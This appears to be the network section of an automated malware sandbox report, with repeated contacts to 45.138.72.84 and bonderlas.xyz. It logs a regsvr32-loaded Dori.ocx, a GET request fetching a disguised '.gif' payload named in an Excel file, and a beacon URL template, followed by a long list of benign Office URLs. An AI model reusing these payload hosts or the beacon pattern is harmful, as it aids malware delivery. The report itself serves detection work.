            Source: unknownTCP traffic detected without corresponding DNS query: 45.138.72.84
            Source: unknownTCP traffic detected without corresponding DNS query: 45.138.72.84
            Source: unknownTCP traffic detected without corresponding DNS query: 45.138.72.84
            Source: unknownTCP traffic detected without corresponding DNS query: 45.138.72.84
            Source: unknownTCP traffic detected without corresponding DNS query: 45.138.72.84
            Source: unknownTCP traffic detected without corresponding DNS query: 45.138.72.84
            Source: unknownTCP traffic detected without corresponding DNS query: 45.138.72.84
            Source: unknownTCP traffic detected without corresponding DNS query: 45.138.72.84
            Source: unknownTCP traffic detected without corresponding DNS query: 45.138.72.84
            Source: unknownTCP traffic detected without corresponding DNS query: 45.138.72.84
            Source: unknownTCP traffic detected without corresponding DNS query: 45.138.72.84
            Source: unknownTCP traffic detected without corresponding DNS query: 45.138.72.84
            Source: unknownTCP traffic detected without corresponding DNS query: 45.138.72.84
            Source: unknownTCP traffic detected without corresponding DNS query: 45.138.72.84
            Source: unknownTCP traffic detected without corresponding DNS query: 45.138.72.84
            Source: unknownTCP traffic detected without corresponding DNS query: 45.138.72.84
            Source: unknownTCP traffic detected without corresponding DNS query: 45.138.72.84
            Source: unknownTCP traffic detected without corresponding DNS query: 45.138.72.84
            Source: unknownTCP traffic detected without corresponding DNS query: 45.138.72.84
            Source: unknownTCP traffic detected without corresponding DNS query: 45.138.72.84
            Source: unknownTCP traffic detected without corresponding DNS query: 45.138.72.84
            Source: unknownTCP traffic detected without corresponding DNS query: 45.138.72.84
            Source: unknownTCP traffic detected without corresponding DNS query: 45.138.72.84
            Source: unknownTCP traffic detected without corresponding DNS query: 45.138.72.84
            Source: unknownTCP traffic detected without corresponding DNS query: 45.138.72.84
            Source: unknownTCP traffic detected without corresponding DNS query: 45.138.72.84
            Source: unknownTCP traffic detected without corresponding DNS query: 45.138.72.84
            Source: unknownTCP traffic detected without corresponding DNS query: 45.138.72.84
            Source: unknownTCP traffic detected without corresponding DNS query: 45.138.72.84
            Source: unknownTCP traffic detected without corresponding DNS query: 45.138.72.84
            Source: unknownTCP traffic detected without corresponding DNS query: 45.138.72.84
            Source: unknownTCP traffic detected without corresponding DNS query: 45.138.72.84
            Source: unknownTCP traffic detected without corresponding DNS query: 45.138.72.84
            Source: unknownTCP traffic detected without corresponding DNS query: 45.138.72.84
            Source: unknownTCP traffic detected without corresponding DNS query: 45.138.72.84
            Source: unknownTCP traffic detected without corresponding DNS query: 45.138.72.84
            Source: unknownTCP traffic detected without corresponding DNS query: 45.138.72.84
            Source: unknownTCP traffic detected without corresponding DNS query: 45.138.72.84
            Source: unknownTCP traffic detected without corresponding DNS query: 45.138.72.84
            Source: unknownTCP traffic detected without corresponding DNS query: 45.138.72.84
            Source: unknownTCP traffic detected without corresponding DNS query: 45.138.72.84
            Source: unknownTCP traffic detected without corresponding DNS query: 45.138.72.84
            Source: unknownTCP traffic detected without corresponding DNS query: 45.138.72.84
            Source: unknownTCP traffic detected without corresponding DNS query: 45.138.72.84
            Source: unknownTCP traffic detected without corresponding DNS query: 45.138.72.84
            Source: unknownTCP traffic detected without corresponding DNS query: 45.138.72.84
            Source: unknownTCP traffic detected without corresponding DNS query: 45.138.72.84
            Source: unknownTCP traffic detected without corresponding DNS query: 45.138.72.84
            Source: unknownTCP traffic detected without corresponding DNS query: 45.138.72.84
            Source: unknownTCP traffic detected without corresponding DNS query: 45.138.72.84
            Source: unknownTCP traffic detected without corresponding DNS query: 45.138.72.84
            Source: unknownTCP traffic detected without corresponding DNS query: 45.138.72.84
            Source: unknownTCP traffic detected without corresponding DNS query: 45.138.72.84
            Source: unknownTCP traffic detected without corresponding DNS query: 45.138.72.84
            Source: unknownTCP traffic detected without corresponding DNS query: 45.138.72.84
            Source: unknownTCP traffic detected without corresponding DNS query: 45.138.72.84
            Source: unknownTCP traffic detected without corresponding DNS query: 45.138.72.84
            Source: unknownTCP traffic detected without corresponding DNS query: 45.138.72.84
            Source: unknownTCP traffic detected without corresponding DNS query: 45.138.72.84
            Source: unknownTCP traffic detected without corresponding DNS query: 45.138.72.84
            Source: unknownTCP traffic detected without corresponding DNS query: 45.138.72.84
            Source: unknownTCP traffic detected without corresponding DNS query: 45.138.72.84
            Source: unknownTCP traffic detected without corresponding DNS query: 45.138.72.84
            Source: unknownTCP traffic detected without corresponding DNS query: 45.138.72.84
            Source: unknownTCP traffic detected without corresponding DNS query: 45.138.72.84
            Source: unknownTCP traffic detected without corresponding DNS query: 45.138.72.84
            Source: unknownTCP traffic detected without corresponding DNS query: 45.138.72.84
            Source: unknownTCP traffic detected without corresponding DNS query: 45.138.72.84
            Source: unknownTCP traffic detected without corresponding DNS query: 45.138.72.84
            Source: unknownTCP traffic detected without corresponding DNS query: 45.138.72.84
            Source: unknownTCP traffic detected without corresponding DNS query: 45.138.72.84
            Source: unknownTCP traffic detected without corresponding DNS query: 45.138.72.84
            Source: unknownTCP traffic detected without corresponding DNS query: 45.138.72.84
            Source: unknownTCP traffic detected without corresponding DNS query: 45.138.72.84
            Source: unknownTCP traffic detected without corresponding DNS query: 45.138.72.84
            Source: unknownTCP traffic detected without corresponding DNS query: 45.138.72.84
            Source: unknownTCP traffic detected without corresponding DNS query: 45.138.72.84
            Source: unknownTCP traffic detected without corresponding DNS query: 45.138.72.84
            Source: unknownTCP traffic detected without corresponding DNS query: 45.138.72.84
            Source: unknownTCP traffic detected without corresponding DNS query: 45.138.72.84
            Source: unknownTCP traffic detected without corresponding DNS query: 45.138.72.84
            Source: unknownTCP traffic detected without corresponding DNS query: 45.138.72.84
            Source: unknownTCP traffic detected without corresponding DNS query: 45.138.72.84
            Source: unknownTCP traffic detected without corresponding DNS query: 45.138.72.84
            Source: unknownTCP traffic detected without corresponding DNS query: 45.138.72.84
            Source: unknownTCP traffic detected without corresponding DNS query: 45.138.72.84
            Source: unknownTCP traffic detected without corresponding DNS query: 45.138.72.84
            Source: unknownTCP traffic detected without corresponding DNS query: 45.138.72.84
            Source: unknownTCP traffic detected without corresponding DNS query: 45.138.72.84
            Source: unknownTCP traffic detected without corresponding DNS query: 45.138.72.84
            Source: unknownTCP traffic detected without corresponding DNS query: 45.138.72.84
            Source: unknownTCP traffic detected without corresponding DNS query: 45.138.72.84
            Source: unknownTCP traffic detected without corresponding DNS query: 45.138.72.84
            Source: unknownTCP traffic detected without corresponding DNS query: 45.138.72.84
            Source: unknownTCP traffic detected without corresponding DNS query: 45.138.72.84
            Source: unknownTCP traffic detected without corresponding DNS query: 45.138.72.84
            Source: unknownTCP traffic detected without corresponding DNS query: 45.138.72.84
            Source: global trafficHTTP traffic detected: GET /10.11nov322.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 45.138.72.84Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /10.11nov322.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 45.138.72.84Connection: Keep-Alive
            Source: msapplication.xml0.5.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x951d8fca,0x01d6ba09</date><accdate>0x951d8fca,0x01d6ba09</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
            Source: msapplication.xml0.5.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x951d8fca,0x01d6ba09</date><accdate>0x951ff26c,0x01d6ba09</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
            Source: msapplication.xml5.5.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x952254c7,0x01d6ba09</date><accdate>0x952254c7,0x01d6ba09</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
            Source: msapplication.xml5.5.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x952254c7,0x01d6ba09</date><accdate>0x952254c7,0x01d6ba09</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
            Source: msapplication.xml7.5.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x9524b70b,0x01d6ba09</date><accdate>0x9524b70b,0x01d6ba09</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
            Source: msapplication.xml7.5.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x9524b70b,0x01d6ba09</date><accdate>0x9524b70b,0x01d6ba09</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
            Source: msapplication.xml0.5.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x951d8fca,0x01d6ba09</date><accdate>0x951d8fca,0x01d6ba09</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
            Source: msapplication.xml0.5.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x951d8fca,0x01d6ba09</date><accdate>0x951ff26c,0x01d6ba09</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
            Source: msapplication.xml5.5.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x952254c7,0x01d6ba09</date><accdate>0x952254c7,0x01d6ba09</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
            Source: msapplication.xml5.5.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x952254c7,0x01d6ba09</date><accdate>0x952254c7,0x01d6ba09</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
            Source: msapplication.xml7.5.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x9524b70b,0x01d6ba09</date><accdate>0x9524b70b,0x01d6ba09</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
            Source: msapplication.xml7.5.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x9524b70b,0x01d6ba09</date><accdate>0x9524b70b,0x01d6ba09</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
            Source: unknownDNS traffic detected: queries for: bonderlas.xyz
            Source: unknownDNS traffic detected: queries for: bonderlas.xyz
            Source: regsvr32.exe, 00000001.00000003.230333485.00000000064F0000.00000004.00000040.sdmpString found in binary or memory: http://%s=%s&file://&os=%u.%u_%u_%u_x%uindex.html;
            Source: sharedStrings.binString found in binary or memory: http://45.138.72.84/10.11nov322.gif
            Source: Dori.ocx.0.drString found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
            Source: Dori.ocx.0.drString found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
            Source: Dori.ocx.0.drString found in binary or memory: http://ocsp.sectigo.com0
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: http://weather.service.msn.com/data.aspx
            Source: msapplication.xml.5.drString found in binary or memory: http://www.amazon.com/
            Source: msapplication.xml1.5.drString found in binary or memory: http://www.google.com/
            Source: msapplication.xml2.5.drString found in binary or memory: http://www.live.com/
            Source: msapplication.xml3.5.drString found in binary or memory: http://www.nytimes.com/
            Source: msapplication.xml4.5.drString found in binary or memory: http://www.reddit.com/
            Source: msapplication.xml5.5.drString found in binary or memory: http://www.twitter.com/
            Source: msapplication.xml6.5.drString found in binary or memory: http://www.wikipedia.com/
            Source: msapplication.xml7.5.drString found in binary or memory: http://www.youtube.com/
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://analysis.windows.net/powerbi/api
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://api.aadrm.com/
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://api.addins.omex.office.net/appinfo/query
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://api.diagnostics.office.com
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://api.diagnosticssdf.office.com
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://api.microsoftstream.com/api/
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://api.office.net
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://api.onedrive.com
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://apis.live.net/v5.0/
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://arc.msn.com/v4/api/selection
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://augloop.office.com
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://augloop.office.com/v2
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://autodiscover-s.outlook.com
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
            Source: regsvr32.exe, regsvr32.exe, 00000001.00000003.230333485.00000000064F0000.00000004.00000040.sdmpString found in binary or memory: https://bonderlas.xyz
            Source: regsvr32.exe, 00000001.00000002.494838994.00000000064F0000.00000004.00000040.sdmp, ~DF4EEB7094F37C54EC.TMP.34.drString found in binary or memory: https://bonderlas.xyz/index.htm
            Source: {BE482461-25FC-11EB-90E4-ECF4BB862DED}.dat.5.drString found in binary or memory: https://bonderlas.xyz/index.htmRoot
            Source: {BE482461-25FC-11EB-90E4-ECF4BB862DED}.dat.5.drString found in binary or memory: https://bonderlas.xyz/index.htmindex.htm
            Source: regsvr32.exe, 00000001.00000003.230333485.00000000064F0000.00000004.00000040.sdmpString found in binary or memory: https://bonderlas.xyzQ
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://cdn.entity.
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://clients.config.office.net/
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://config.edge.skype.com
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://cortana.ai
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://cr.office.com
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://dataservice.o365filtering.com
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://dataservice.o365filtering.com/
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://devnull.onenote.com
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://directory.services.
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://ecs.office.com/config/v2/Office
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://entitlement.diagnostics.office.com
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://globaldisco.crm.dynamics.com
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://graph.ppe.windows.net
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://graph.ppe.windows.net/
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://graph.windows.net
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://graph.windows.net/
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&amp;premium=1
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&amp;premium=1
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&amp;premium=1
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://incidents.diagnostics.office.com
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&amp;adlt=strict&amp;hostType=Immersive
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://lifecycle.office.com
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://login.microsoftonline.com/
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://login.windows.local
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://management.azure.com
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://management.azure.com/
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://messaging.office.com/
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://ncus-000.contentsync.
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://ncus-000.pagecontentsync.
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://officeapps.live.com
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://onedrive.live.com
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://onedrive.live.com/embed?
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://outlook.office.com
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://outlook.office365.com
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://powerlift.acompli.net
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
